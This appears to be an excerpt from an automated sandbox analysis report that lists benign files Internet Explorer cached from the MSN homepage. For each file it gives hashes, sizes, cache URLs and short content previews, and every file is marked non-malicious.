                                                                                                                                                                                            Preview: ......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......K.d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..I.&q..Z5.V......{{.N....9d..... g.T..y...s....'........... uq...p.>.....4R........ag..%T`.z}(.N....*g|..oEc....VfY.J.\a.<..J..0.@..`..v........i.r.U7.{.....?Z..4.....]H.w.........t..X.eV...G.@.A.....r9..O.HL...../......k.|Yh...f..8b.7.t.]...........+..{r.......' 18.....IY.u..ST.(.PG..Z...c..U.....|)...8.[...q._.......V...dg.1..G.f..Z.xM..O....8'.;.=.
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\BBK9Hzy[1].png
                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):541
                                                                                                                                                                                            Entropy (8bit):7.367354185122177
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:6v/78/W/6T4onImZBfSKTIxS9oXhTDxfIR3N400tf3QHPK5jifFpEPy:U/6rIcBfYxGoxfxfrLqHPKhif7T
                                                                                                                                                                                            MD5:4F50C6271B3DF24A75AD8E9822453DA3
                                                                                                                                                                                            SHA1:F8987C61D1C2D2EC12D23439802D47D43FED3BDF
                                                                                                                                                                                            SHA-256:9AE6A4C5EF55043F07D888AB192D82BB95D38FA54BB3D41F701863239E16E21C
                                                                                                                                                                                            SHA-512:AFA483EAFEAF31530487039FB1727B819D4E61E54C395BA9553C721FB83C3B16EDF88E60853387A4920AB8F7DFAD704D1B6D4C12CDC302BE05427FC90E7FACC8
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBK9Hzy.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                            Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs.................IDAT8O.Q.K[A...M^L../+....`4..x.GAiQb..E<..A.x..'!.P(-..x....`.,...D.)............ov..Yx.`_.4...@._ .r...w.$.H....W...........mj."...IR~f...J..D.|q.......~.<....<.I(t.q.....t...0.....h,.1.......\.1.........m......+.zB..C.....^.u:.....j.o*..j....\../eH.,......}...d-<!t.\.>..X.y.W....evg.Jho..=w*.*Y...n.@.....e.X.z.G.........(4.H...P.L.:".%tls....jq..5....<.)~....x...]u(..o./H.....Hvf....*E.D.).......j/j.=]......Z.<Z....IEND.B`.
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\BBOLLMj[1].png
                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):507
                                                                                                                                                                                            Entropy (8bit):7.140014669230146
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:6v/78/soC6yG9YjUiWGS3Sw38Cztj2ChFblexnDizTGN:RCMnX3fxzhhqxn8TGN
                                                                                                                                                                                            MD5:25D424F126A464CA028C0C9BA692ADA9
                                                                                                                                                                                            SHA1:E54F845D1099C8D7B7BA0C5E9B57DFA7163CE95C
                                                                                                                                                                                            SHA-256:E0DF9CDAFF2557C7B555FFAED40B7E553FF6C50DD58FE79C27B3AA69CC56258D
                                                                                                                                                                                            SHA-512:7E72F13B354AA5EE99EC50057DB2BFBC35A78D5617A36ED90864D1DA6AC1B692301115EF8F44255AB3894142D6C0F634A2CFD44EBCD00B039DC628F751579DC3
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBOLLMj.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                            Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....IDAT8Oc.v.............g8......'.......X].............l.....z..]\.|d...i5U`.,,,......~.f.+-ax..5T..`....S.M{......d..w?...1..?..Vo...G....>z.L...2..10222.::1...1....,..0.........``b.HgFE3<;z..,5..G.,P...........t..Y._.}...TT..}.l..0..j......%..^.{.f.9;c....aAA0...w0]....ag.fc...(HK...>0....!=".AMQ.,..`......y...8.a....k.D..`..J8..!`....|.R...@S.,..0...&..2...0.8t.....yq..B...Wo..@...F..........ks.....IEND.B`.
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\BBPfCZL[1].png
                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:GIF image data, version 89a, 50 x 50
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):2313
                                                                                                                                                                                            Entropy (8bit):7.594679301225926
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:5Zvh21Zt5SkY33fS+PuSsgSrrVi7X3ZgMjkCqBn9VKg3dPnRd:vkrrS333q+PagKk7X3ZgaI9kMpRd
                                                                                                                                                                                            MD5:59DAB7927838DE6A39856EED1495701B
                                                                                                                                                                                            SHA1:A80734C857BFF8FF159C1879A041C6EA2329A1FA
                                                                                                                                                                                            SHA-256:544BA9B5585B12B62B01C095633EFC953A7732A29CB1E941FDE5AD62AD462D57
                                                                                                                                                                                            SHA-512:7D3FB1A5CC782E3C5047A6C5F14BF26DD39B8974962550193464B84A9B83B4C42FB38B19BD0CEF8247B78E3674F0C26F499DAFCF9AF780710221259D2625DB86
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                            Preview: GIF89a2.2.....7..;..?..C..I..H..<..9.....8..F..7..E..@..C..@..6..9..8..J..*z.G..>..?..A..6..>..8..:..A..=..B..4..B..D..=..K..=..@..<..:..3~.B..D.....,|.4..2..6..:..J..;..G....Fl..1}.4..R.....Y..E..>..9..5..X..A..2..P..J../|.9.....T.+Z.....+..<.Fq.Gn..V..;..7.Lr..W..C..<.Fp.]......A.....0{.L..E..H..@.....3..3..O..M..K....#[.3i..D..>........I....<n..;..Z..1..G..8..E....Hu..1..>..T..a.Fs..C..8..0}....;..6..t.Ft..5.Bi..:.x...E.....'z^~.......[....8`..........;..@..B.....7.....<.................F.....6...........>..?.n......g.......s...)a.Cm....'a.0Z..7....3f..<.:e.....@.q.....Ds..B....!P.n...J............Li..=......F.....B.....:r....w..|..........`..[}.g...J.Ms..K.Ft.....'..>..........Ry.Nv.n..]..Bl........S..;....Dj.....=.....O.y.......6..J.......)V..g..5.......!..NETSCAPE2.0.....!...d...,....2.2........3.`..9.(|.d.C .wH.(."D...(D.....d.Y......<.(PP.F...dL.@.&.28..$1S....*TP......>...L..!T.X!.(..@a..IsgM..|..Jc(Q.+.......2.:.)y2.J......W,..eW2.!....!....C.....d...zeh....P.
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\BBih5H[1].png
                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):930
                                                                                                                                                                                            Entropy (8bit):7.648838107672973
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:4Blz5F/i83HMOlt4Ol9Okcvz7v590ZIVkQ/k8xMd:4Bl9F/iCN7ikcHv5CZIbMV
                                                                                                                                                                                            MD5:F1AEB21B524DE2509415284BB45C9D1B
                                                                                                                                                                                            SHA1:9C5D17A573FE2DC2ACB2729381BC777C9C8474A3
                                                                                                                                                                                            SHA-256:EFD678CBFA67BBD38DCF9BFBDBA90804EA2425B93F0A7447DACA21F9ECCCD458
                                                                                                                                                                                            SHA-512:5FDD9593498D0C5C479CEB7CD51CE39F47F27A7ECA75D66372E9F633C5D35AC5350B6D3DBD5F3830C2F2A45E53C80340D2B3502A48CF0051D02EB13C844786CA
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u=true&n=true&w=30&h=30
                                                                                                                                                                                            Preview: .PNG........IHDR.............;0......sRGB.........gAMA......a.....pHYs..........o.d...7IDATHK.UKHUA..f........HQ((_`.K,",..P..(..ha.%QPR..B.T.Dw-2.B`..W{(..Y....K......i............{0.9.^.'HS.."t'....=u...]..!.:=.F..W.Q.M:...1.....e...bZ.4(5 .@DJ..7.....Z..&......jf.aW_.Ndj.[$.k.*.Q. .0.ot.P....pu.1.5...}.....Y...a....<..Mt......d..$>.|.g@....`...15.^..X..R=.6.Jd..y...(F..T..(.7ew.`..Ay.5.....9..d.n3....7<...^.m4.&$JH|I'].:.R....d.j.!...[i4.QT...|.......6......,g.b...."db.{..N:..sj..c..5...,ZX.a.=..*O.P*.:..7Lg.ND...<....c.9Jd.....]5R..!._..:..x..>H..!,`.;...J.#....9..Q....8....s..#DQ.u....}|k.1...e6.6p...V.q.\K....B?..=..40A....#............n._X.Z..+*.r....>>%..G]..<...:z...f.!.w<....n.Y..%g..W...G..W.......C..NKNv.....:..>...F..........7.z..<....\...;.Q..1.|..`Z.OZ.@...`.I|...^..SNe%V...<.6.....o.@#.>.~.... {......n..>@9..u._.wx.......N}..6.^.P....0....'.)........IEND.B`.
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\BBoqF0J[1].png
                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):560
                                                                                                                                                                                            Entropy (8bit):7.449908998628063
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:6v/78/W/6TiijTtDYTPdsRYxf0eHPpyMfps8X9Cdf0RD:U/659CeuxXPDRs6Q0D
                                                                                                                                                                                            MD5:01372BCDDE3A82BACFD4ADC70BDF8A09
                                                                                                                                                                                            SHA1:2E06305F05829C170A2196979FDB67F9DCD1007C
                                                                                                                                                                                            SHA-256:E7034ABBA07C9EB4548B8EB07D7F2B1A69E599DADC199966E58061512123957D
                                                                                                                                                                                            SHA-512:EC8DAAD5B176599C7EE99896311E1918AA975CD2917E18B0FE0EFE2D3A4E42A544E9798B2C11E44358FAD9F237401A668BE15C4B1FB15C7311EB498460376105
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBoqF0J.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                            Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs.................IDAT8O.SO+DQ.?.N3^..d.D.XMfzO66...dIY..6.'P....../.3.......b4.~..;.M..y....s.{W..p...!..&^)..eo....QR. ...1.>./hM.....x._...+..|S...5..ri...@.........\...]...7......(..0.1^`.....\F..A.Pf.[.!}b3s.}.P(....G...*...l6.....J....J.9..a...n...R.T6..8B.....=...\b=..\rJ....M\./.i...t_.F...{@!...-....R&a...V........Gly.Dc.A.4.q.mg2.vI......[.q....T..d..P.J.v.(.tY_.$..Qm.Z.H...i.=.`.as..F...........\.,.0?{W:V..v2.m{....K....U]..~.E....7..z.;YuQ...=.\.X.....IEND.B`.
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\fcmain[1].js
                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):39220
                                                                                                                                                                                            Entropy (8bit):5.071388899927416
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:h1av1Ub8Dn/edW94h+etl+NzdYXf9wOBEZn3SQN3GFl295oflfsBJlJsXl:zQ1UbOcWmh++l+NzdYXf9wOBEZn3SQNu
                                                                                                                                                                                            MD5:E0929EBAF05A3007C742BB87F55927C3
                                                                                                                                                                                            SHA1:E6F633903684FFE384CA076E29712E46029DCEA8
                                                                                                                                                                                            SHA-256:28C8D9CD5D6094CF200F165CCB608D0512390BEA89F837718D439975885F9BAC
                                                                                                                                                                                            SHA-512:B1EAA10FDC6DCE09915704DB8FBE1E62D2EF08EA7918B491B68E635DC25DA7A5AFBBF329267196519A243DB9B85F3C07A87B14E5EE41EBF7016FF29398C9FE6A
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            IE Cache URL:https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3D%3D&crid=722878611&size=306x271&cc=CH&https=1&vif=2&requrl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&nse=5&vi=1608297183298892204&ugd=4&rtbs=1&nb=1&cb=window._mNDetails.initAd
                                                                                                                                                                                            Preview: ;window._mNDetails.initAd({"vi":"1608297183298892204","s":{"_mNL2":{"size":"306x271","viComp":"1608281546723074044","hideAdUnitABP":true,"abpl":"3","custHt":"","setL3100":"1"},"lhp":{"l2wsip":"2887305233","l2ac":""},"_mNe":{"pid":"8PO641UYD","requrl":"https://www.msn.com/de-ch/?ocid=iehp#mnetcrid=722878611#"},"_md":[],"ac":{"content":"<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.01 Transitional\/\/EN\" \"http:\/\/www.w3.org\/TR\/html4\/loose.dtd\">\r\n<html xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\">\r\n<head><meta http-equiv=\"x-dns-prefetch-control\" content=\"on\"><style type=\"text\/css\">body{background-color: transparent;}<\/style><meta name=\"tids\" content=\"a='800072941' b='803767816' c='msn.com' d='entity type'\" \/><script type=\"text\/javascript\">try{window.locHash = (parent._mNDetails && parent._mNDetails.getLocHash && parent._mNDetails.getLocHash(\"722878611\",\"1608297183298892204\")) || (parent._mNDetails[\"locHash\"] && parent._mNDetails[\"locHash\
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\httpErrorPagesScripts[1]
                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):12105
                                                                                                                                                                                            Entropy (8bit):5.451485481468043
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                                                                                                                                                                            MD5:9234071287E637F85D721463C488704C
                                                                                                                                                                                            SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                                                                                                                                                            SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                                                                                                                                                            SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\otBannerSdk[1].js
                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):372457
                                                                                                                                                                                            Entropy (8bit):5.219562494722367
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:B0C8zZ5OVNeBNWabo7QtD+nKmbHgtTVfwBSh:B4zj7BNWaRfh
                                                                                                                                                                                            MD5:DA186E696CD78BC57C0854179AE8704A
                                                                                                                                                                                            SHA1:03FCF360CC8D29A6D63BE8073D0E52FFC2BDDB21
                                                                                                                                                                                            SHA-256:F10DC8CE932F150F2DB28639CF9119144AE979F8209E0AC37BB98D30F6FB718F
                                                                                                                                                                                            SHA-512:4DE19D4040E28177FD995D56993FFACB9A2A0A7AAB8265BD1BBC7400C565BC73CD61B916D23228496515C237EEA14CCC46839F507879F67BA510D97F46B63557
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            IE Cache URL:https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otBannerSdk.js
                                                                                                                                                                                            Preview: /** .. * onetrust-banner-sdk.. * v6.7.0.. * by OneTrust LLC.. * Copyright 2020 .. */..!function () { "use strict"; var o = function (e, t) { return (o = Object.setPrototypeOf || { __proto__: [] } instanceof Array && function (e, t) { e.__proto__ = t } || function (e, t) { for (var o in t) t.hasOwnProperty(o) && (e[o] = t[o]) })(e, t) }; var r = function () { return (r = Object.assign || function (e) { for (var t, o = 1, n = arguments.length; o < n; o++)for (var r in t = arguments[o]) Object.prototype.hasOwnProperty.call(t, r) && (e[r] = t[r]); return e }).apply(this, arguments) }; function l(s, i, a, l) { return new (a = a || Promise)(function (e, t) { function o(e) { try { r(l.next(e)) } catch (e) { t(e) } } function n(e) { try { r(l.throw(e)) } catch (e) { t(e) } } function r(t) { t.done ? e(t.value) : new a(function (e) { e(t.value) }).then(o, n) } r((l = l.apply(s, i || [])).next()) }) } function k(o, n) { var r, s, i, e, a = { label: 0, sent: function () { if (1 & i[0]) throw i[1]
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\otSDKStub[1].js
                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):12814
                                                                                                                                                                                            Entropy (8bit):5.302802185296012
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:pQp/Oc/tyWocJgjgh7kjj3Uz5BpHfkmZqWov:+RbJgjjjaXHfkmvov
                                                                                                                                                                                            MD5:EACEA3C30F1EDAD40E3653FD20EC3053
                                                                                                                                                                                            SHA1:3B4B08F838365110B74350EBC1BEE69712209A3B
                                                                                                                                                                                            SHA-256:58B01E9997EA3202D807141C4C682BCCC2063379D42414A9EBCCA0545DC97918
                                                                                                                                                                                            SHA-512:6E30018933A65EE19E0C5479A76053DE91E5C905DA800DFA7D0DB2475C9766B632F91DE8CC9BD6B90C2FBC4861B50879811EE43D465E5C5434943586B1CC47F1
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            IE Cache URL:https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/scripttemplates/otSDKStub.js
                                                                                                                                                                                            Preview: var OneTrustStub=function(t){"use strict";var l=new function(){this.optanonCookieName="OptanonConsent",this.optanonHtmlGroupData=[],this.optanonHostData=[],this.IABCookieValue="",this.oneTrustIABCookieName="eupubconsent",this.oneTrustIsIABCrossConsentEnableParam="isIABGlobal",this.isStubReady=!0,this.geolocationCookiesParam="geolocation",this.EUCOUNTRIES=["BE","BG","CZ","DK","DE","EE","IE","GR","ES","FR","IT","CY","LV","LT","LU","HU","MT","NL","AT","PL","PT","RO","SI","SK","FI","SE","GB","HR","LI","NO","IS"],this.stubFileName="otSDKStub",this.DATAFILEATTRIBUTE="data-domain-script",this.bannerScriptName="otBannerSdk.js",this.mobileOnlineURL=[],this.isMigratedURL=!1,this.migratedCCTID="[[OldCCTID]]",this.migratedDomainId="[[NewDomainId]]",this.userLocation={country:"",state:""}},e=(i.prototype.initConsentSDK=function(){this.initCustomEventPolyfill(),this.ensureHtmlGroupDataInitialised(),this.updateGtmMacros(),this.fetchBannerSDKDependency()},i.prototype.fetchBannerSDKDependency=function(
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\otTCF-ie[1].js
                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):102879
                                                                                                                                                                                            Entropy (8bit):5.311489377663803
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:ONkWT0m7r8N1qpPVsjvB6z4Yj3RCjnugKtLEdT8xJORONTMC5GkkJ0XcJGk58:8kunecpuj5QRCjnrKxJg0TMC5ZW8
                                                                                                                                                                                            MD5:52F29FAC6C1D2B0BAC8FE5D0AA2F7A15
                                                                                                                                                                                            SHA1:D66C777DA4B6D1FEE86180B2B45A3954AE7E0AED
                                                                                                                                                                                            SHA-256:E497A9E7A9620236A9A67F77D2CDA1CC9615F508A392ECCA53F63D2C8283DC0E
                                                                                                                                                                                            SHA-512:DF33C49B063AEFD719B47F9335A4A7CE38FA391B2ADF5ACFD0C3FE891A5D0ADDF1C3295E6FF44EE08E729F96E0D526FFD773DC272E57C3B247696B79EE1168BA
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            IE Cache URL:https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otTCF-ie.js
                                                                                                                                                                                            Preview: !function(){"use strict";var c="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};function e(e){return e&&e.__esModule&&Object.prototype.hasOwnProperty.call(e,"default")?e.default:e}function t(e,t){return e(t={exports:{}},t.exports),t.exports}function n(e){return e&&e.Math==Math&&e}function p(e){try{return!!e()}catch(e){return!0}}function E(e,t){return{enumerable:!(1&e),configurable:!(2&e),writable:!(4&e),value:t}}function o(e){return w.call(e).slice(8,-1)}function u(e){if(null==e)throw TypeError("Can't call method on "+e);return e}function l(e){return I(u(e))}function f(e){return"object"==typeof e?null!==e:"function"==typeof e}function i(e,t){if(!f(e))return e;var n,r;if(t&&"function"==typeof(n=e.toString)&&!f(r=n.call(e)))return r;if("function"==typeof(n=e.valueOf)&&!f(r=n.call(e)))return r;if(!t&&"function"==typeof(n=e.toString)&&!f(r=n.call(e)))return r;throw TypeError("Can't convert object to primitive value")}function y(e,t){retur
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\41-0bee62-68ddb2ab[1].js
                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):1238
                                                                                                                                                                                            Entropy (8bit):5.066474690445609
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:HWwAaHZRRIYfOeXPmMHUKq6GGiqIlQCQ6cQflgKioUInJaqzrQJ:HWwAabuYfO8HTq0xB6XfyNoUiJaD
                                                                                                                                                                                            MD5:7ADA9104CCDE3FDFB92233C8D389C582
                                                                                                                                                                                            SHA1:4E5BA29703A7329EC3B63192DE30451272348E0D
                                                                                                                                                                                            SHA-256:F2945E416DDD2A188D0E64D44332F349B56C49AC13036B0B4FC946A2EBF87D99
                                                                                                                                                                                            SHA-512:2967FBCE4E1C6A69058FDE4C3DC2E269557F7FAD71146F3CCD6FC9085A439B7D067D5D1F8BD2C7EC9124B7E760FBC7F25F30DF21F9B3F61D1443EC3C214E3FFF
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/direction=ltr.locales=de-ch.themes=start.dpi=resolution1x/41-0bee62-68ddb2ab?ver=20201216_29807887&fdhead=gholdout&ocid=iehp&csopd=20201123234311&csopdb=20201204234342
                                                                                                                                                                                            Preview: define("meOffice",["jquery","jqBehavior","mediator","refreshModules","headData","webStorage","window"],function(n,t,i,r,u,f,e){function o(t,o){function v(n){var r=e.localStorage,i,t,u;if(r&&r.deferLoadedItems)for(i=r.deferLoadedItems.split(","),t=0,u=i.length;t<u;t++)if(i[t]&&i[t].indexOf(n)!==-1){f.removeItem(i[t]);break}}function a(){var i=t.find("section li time");i.each(function(){var t=new Date(n(this).attr("datetime"));t&&n(this).html(t.toLocaleString())})}function p(){c=t.find("[data-module-id]").eq(0);c.length&&(h=c.data("moduleId"),h&&(l="moduleRefreshed-"+h,i.sub(l,a)))}function y(){i.unsub(o.eventName,y);r(s).done(function(){a();p()})}var s,c,h,l;return u.signedin||(t.hasClass("office")?v("meOffice"):t.hasClass("onenote")&&v("meOneNote")),{setup:function(){s=t.find("[data-module-deferred-hover], [data-module-deferred]").not("[data-sso-dependent]");s.length&&s.data("module-deferred-hover")&&s.html("<p class='meloading'><\/p>");i.sub(o.eventName,y)},teardown:function(){h&&i.un
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\58-acd805-185735b[1].css
                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):248259
                                                                                                                                                                                            Entropy (8bit):5.296919839301188
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:jaBMUzTAHEkm8OUdvUvXZkrlY6pjs4tQH:ja+UzTAHLOUdvKZkrlY6pjs4tQH
                                                                                                                                                                                            MD5:79C2D313725782EAEDD83A70C92618D7
                                                                                                                                                                                            SHA1:56C34BD33D1B2CABAB67C5B840CC95F91584C56F
                                                                                                                                                                                            SHA-256:306DFFAFE7F142629F1E168F852F346CF773935D662D2B1B4011676D1F4ECEA0
                                                                                                                                                                                            SHA-512:467E8BD67827E09001F78770197CCB7C143A7986B70036FBF79549E78BD03EAFEA15FEF8310DE02250B437D3FB550D68E7CA0EB66C1DDC592B874BF809B257DF
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/f60532dd-b4e015d1/direction=ltr.locales=de-ch.themes=start.dpi=resolution1x/9c-37febd-4f1754d1/65-6e1922-2d8c3c8a/7f-145015-491caa4c/7d-3d0302-6afa84ff/2c-6389fe-f30d5d05/c0-77dd6d-3136911a/51-e120b3-267d49e0/7a-e2312d-feaf21fa/ed-6bbb92-bae7c25b/5e-713ade-ecdc80c3/d1-5e8ab1-e8e1efc6/7a-47adc9-4e5cd0ee/b7-e7d713-eb5d7a7/ed-955bb7-6397bdd4/47-208f84-846eb25/ec-8eee22-6019ddb8/8f-4d6463-72d94145/9e-28f71d-e0a4caac/6f-b7ee08-bb3f087/16-5c9460-358c786e/ba-cdcc9e-a1a2fb72/58-acd805-185735b?ver=20201216_29807887&fdhead=gholdout&ocid=iehp&csopd=20201123234311&csopdb=20201204234342
